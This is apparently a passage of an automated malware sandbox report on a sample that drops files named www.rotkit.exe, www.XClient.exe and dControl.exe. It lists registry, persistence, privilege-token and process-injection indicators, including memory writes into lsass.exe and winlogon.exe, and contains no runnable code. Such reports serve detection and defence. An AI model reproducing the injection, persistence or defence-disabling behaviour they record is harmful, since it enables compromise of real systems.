Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	mousocoreworker.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	mousocoreworker.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

Processes:

mousocoreworker.exewmiprvse.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	mousocoreworker.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	wmiprvse.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

WaaSMedicAgent.exesvchost.exepowershell.EXEmousocoreworker.exesvchost.exeOfficeClickToRun.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	WaaSMedicAgent.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\42-72-4b-4e-13-12\WpadDecisionReason = "1"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={27D6FD15-D07D-4FBB-BD69-05A5882CAEDD}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\00184010F86B2C47 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000a69214f3d6736b4d85981f88e145522b00000000020000000000106600000001000020000000dacba249f23609ce678fcae26485ceb390e03ebb0949c2f0bc244d7a24b303b7000000000e80000000020000200000000f9b89f6ef49591089d62936250b3b4cf8598d208a4a7a44f6f4f498476c37ca8000000017817d5e9b7ea598a66623b58991b7ec0605a9d94b0505ad4d48a8505918f68487081aa8dce8db25b63ac92f34e47d2f8c442ef3ccb8c525252290f258507fef49f1bf8782b38b1b22f371f0a56f732101e3a61157432a568b2edbc5f9a7b68f6140c4f627a651dc875c67bd6989e2355d766b03de05e76d22e90f64fa1447ed4000000000192d8b2a8fe2e8be9171fab5c7618bbd804e9f807888ac791f0e1d688783220319e7b389f45c996d4e9df491031bf60cf83f446e5e5d186c915d8ad076d1a9	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	mousocoreworker.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}	mousocoreworker.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows	mousocoreworker.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Fri, 15 Nov 2024 02:05:21 GMT"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property	mousocoreworker.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\42-72-4b-4e-13-12\WpadDecision = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	WaaSMedicAgent.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek\CacheStore	mousocoreworker.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE

Modifies registry class 25 IoCs

Processes:

explorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exesihost.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.Search_cw5n1h2txyewy\WasEverActivated = "1"	sihost.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	explorer.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

2568 schtasks.exe

pid	process
2568	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

dControl.exepowershell.EXEdControl.exedControl.exedllhost.exepowershell.exedControl.exe

pid	process
4656	dControl.exe
4656	dControl.exe
4656	dControl.exe
4656	dControl.exe
2024	powershell.EXE
4656	dControl.exe
4656	dControl.exe
4024	dControl.exe
4024	dControl.exe
4024	dControl.exe
4024	dControl.exe
4024	dControl.exe
4024	dControl.exe
3948	dControl.exe
3948	dControl.exe
2024	powershell.EXE
2024	powershell.EXE
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
2096	powershell.exe
2096	powershell.exe
2096	powershell.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
2096	powershell.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
2096	powershell.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
1184	dllhost.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
2096	powershell.exe
3948	dControl.exe
3948	dControl.exe
1184	dllhost.exe
1184	dllhost.exe
2732	dControl.exe
2732	dControl.exe
1184	dllhost.exe
1184	dllhost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

dControl.exe

pid process

3948 dControl.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

www.XClient.exedControl.exepowershell.EXEdControl.exedllhost.exepowershell.exeExplorer.EXEdControl.exepowershell.exesvchost.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	3936	www.XClient.exe
Token: SeDebugPrivilege	4656	dControl.exe
Token: SeAssignPrimaryTokenPrivilege	4656	dControl.exe
Token: SeIncreaseQuotaPrivilege	4656	dControl.exe
Token: 0	4656	dControl.exe
Token: SeDebugPrivilege	2024	powershell.EXE
Token: SeDebugPrivilege	4024	dControl.exe
Token: SeAssignPrimaryTokenPrivilege	4024	dControl.exe
Token: SeIncreaseQuotaPrivilege	4024	dControl.exe
Token: SeDebugPrivilege	2024	powershell.EXE
Token: SeDebugPrivilege	1184	dllhost.exe
Token: SeDebugPrivilege	2096	powershell.exe
Token: SeShutdownPrivilege	3460	Explorer.EXE
Token: SeCreatePagefilePrivilege	3460	Explorer.EXE
Token: SeShutdownPrivilege	3460	Explorer.EXE
Token: SeCreatePagefilePrivilege	3460	Explorer.EXE
Token: SeShutdownPrivilege	3460	Explorer.EXE
Token: SeCreatePagefilePrivilege	3460	Explorer.EXE
Token: SeShutdownPrivilege	3460	Explorer.EXE
Token: SeCreatePagefilePrivilege	3460	Explorer.EXE
Token: SeDebugPrivilege	3948	dControl.exe
Token: SeAssignPrimaryTokenPrivilege	3948	dControl.exe
Token: SeIncreaseQuotaPrivilege	3948	dControl.exe
Token: 0	3948	dControl.exe
Token: SeShutdownPrivilege	3460	Explorer.EXE
Token: SeCreatePagefilePrivilege	3460	Explorer.EXE
Token: SeShutdownPrivilege	3460	Explorer.EXE
Token: SeCreatePagefilePrivilege	3460	Explorer.EXE
Token: SeShutdownPrivilege	3460	Explorer.EXE
Token: SeCreatePagefilePrivilege	3460	Explorer.EXE
Token: SeDebugPrivilege	4344	powershell.exe
Token: SeShutdownPrivilege	2388	svchost.exe
Token: SeCreatePagefilePrivilege	2388	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1476	svchost.exe
Token: SeIncreaseQuotaPrivilege	1476	svchost.exe
Token: SeSecurityPrivilege	1476	svchost.exe
Token: SeTakeOwnershipPrivilege	1476	svchost.exe
Token: SeLoadDriverPrivilege	1476	svchost.exe
Token: SeBackupPrivilege	1476	svchost.exe
Token: SeRestorePrivilege	1476	svchost.exe
Token: SeShutdownPrivilege	1476	svchost.exe
Token: SeSystemEnvironmentPrivilege	1476	svchost.exe
Token: SeManageVolumePrivilege	1476	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1476	svchost.exe
Token: SeIncreaseQuotaPrivilege	1476	svchost.exe
Token: SeSecurityPrivilege	1476	svchost.exe
Token: SeTakeOwnershipPrivilege	1476	svchost.exe
Token: SeLoadDriverPrivilege	1476	svchost.exe
Token: SeSystemtimePrivilege	1476	svchost.exe
Token: SeBackupPrivilege	1476	svchost.exe
Token: SeRestorePrivilege	1476	svchost.exe
Token: SeShutdownPrivilege	1476	svchost.exe
Token: SeSystemEnvironmentPrivilege	1476	svchost.exe
Token: SeUndockPrivilege	1476	svchost.exe
Token: SeManageVolumePrivilege	1476	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1476	svchost.exe
Token: SeIncreaseQuotaPrivilege	1476	svchost.exe
Token: SeSecurityPrivilege	1476	svchost.exe
Token: SeTakeOwnershipPrivilege	1476	svchost.exe
Token: SeLoadDriverPrivilege	1476	svchost.exe
Token: SeSystemtimePrivilege	1476	svchost.exe
Token: SeBackupPrivilege	1476	svchost.exe
Token: SeRestorePrivilege	1476	svchost.exe
Token: SeShutdownPrivilege	1476	svchost.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

dControl.exe

pid	process
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

dControl.exe

pid	process
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe
3948	dControl.exe

Suspicious use of SetWindowsHookEx 25 IoCs

Processes:

OpenWith.exewww.XClient.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exeOpenWith.exe

pid	process
4956	OpenWith.exe
3936	www.XClient.exe
4660	OpenWith.exe
1840	OpenWith.exe
3668	OpenWith.exe
4436	OpenWith.exe
4796	OpenWith.exe
4108	OpenWith.exe
2880	OpenWith.exe
4652	OpenWith.exe
1408	OpenWith.exe
5080	OpenWith.exe
2884	OpenWith.exe
2312	OpenWith.exe
2740	OpenWith.exe
1712	OpenWith.exe
3540	OpenWith.exe
3116	OpenWith.exe
4816	OpenWith.exe
2416	OpenWith.exe
456	OpenWith.exe
4816	OpenWith.exe
5052	OpenWith.exe
3348	OpenWith.exe
4640	OpenWith.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid process

3460 Explorer.EXE

pid	process
3460	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exewww.rotkit.exepowershell.EXEdllhost.exewww.XClient.exelsass.exe

description	pid	process	target process
PID 1968 wrote to memory of 4656	1968	c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe	dControl.exe
PID 1968 wrote to memory of 4656	1968	c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe	dControl.exe
PID 1968 wrote to memory of 4656	1968	c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe	dControl.exe
PID 1968 wrote to memory of 740	1968	c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe	www.rotkit.exe
PID 1968 wrote to memory of 740	1968	c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe	www.rotkit.exe
PID 1968 wrote to memory of 740	1968	c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe	www.rotkit.exe
PID 1968 wrote to memory of 3936	1968	c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe	www.XClient.exe
PID 1968 wrote to memory of 3936	1968	c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe	www.XClient.exe
PID 1968 wrote to memory of 3936	1968	c497fb31def2da64cc0d027cf9355cbcbf22fd7c255e7cbcde9d80efb9937a9e.exe	www.XClient.exe
PID 740 wrote to memory of 5060	740	www.rotkit.exe	KktXMQ.exe
PID 740 wrote to memory of 5060	740	www.rotkit.exe	KktXMQ.exe
PID 740 wrote to memory of 5060	740	www.rotkit.exe	KktXMQ.exe
PID 2024 wrote to memory of 1184	2024	powershell.EXE	dllhost.exe
PID 2024 wrote to memory of 1184	2024	powershell.EXE	dllhost.exe
PID 2024 wrote to memory of 1184	2024	powershell.EXE	dllhost.exe
PID 2024 wrote to memory of 1184	2024	powershell.EXE	dllhost.exe
PID 2024 wrote to memory of 1184	2024	powershell.EXE	dllhost.exe
PID 2024 wrote to memory of 1184	2024	powershell.EXE	dllhost.exe
PID 2024 wrote to memory of 1184	2024	powershell.EXE	dllhost.exe
PID 2024 wrote to memory of 1184	2024	powershell.EXE	dllhost.exe
PID 1184 wrote to memory of 616	1184	dllhost.exe	winlogon.exe
PID 1184 wrote to memory of 668	1184	dllhost.exe	lsass.exe
PID 1184 wrote to memory of 956	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 384	1184	dllhost.exe	dwm.exe
PID 1184 wrote to memory of 440	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 928	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1076	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1092	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1108	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1140	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1272	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1292	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1368	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1448	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1456	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1532	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1544	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1656	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1680	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1736	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1792	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1868	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1972	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 2000	1184	dllhost.exe	svchost.exe
PID 3936 wrote to memory of 2096	3936	www.XClient.exe	powershell.exe
PID 3936 wrote to memory of 2096	3936	www.XClient.exe	powershell.exe
PID 3936 wrote to memory of 2096	3936	www.XClient.exe	powershell.exe
PID 668 wrote to memory of 2772	668	lsass.exe	sysmon.exe
PID 1184 wrote to memory of 2008	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 1476	1184	dllhost.exe	svchost.exe
PID 668 wrote to memory of 2772	668	lsass.exe	sysmon.exe
PID 1184 wrote to memory of 1016	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 2088	1184	dllhost.exe	spoolsv.exe
PID 1184 wrote to memory of 2200	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 2372	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 2480	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 2488	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 2648	1184	dllhost.exe	sihost.exe
PID 1184 wrote to memory of 2664	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 2716	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 2744	1184	dllhost.exe	taskhostw.exe
PID 1184 wrote to memory of 2772	1184	dllhost.exe	sysmon.exe
PID 1184 wrote to memory of 2784	1184	dllhost.exe	svchost.exe
PID 1184 wrote to memory of 2816	1184	dllhost.exe	svchost.exe

Uses Task Scheduler COM API 1 TTPs
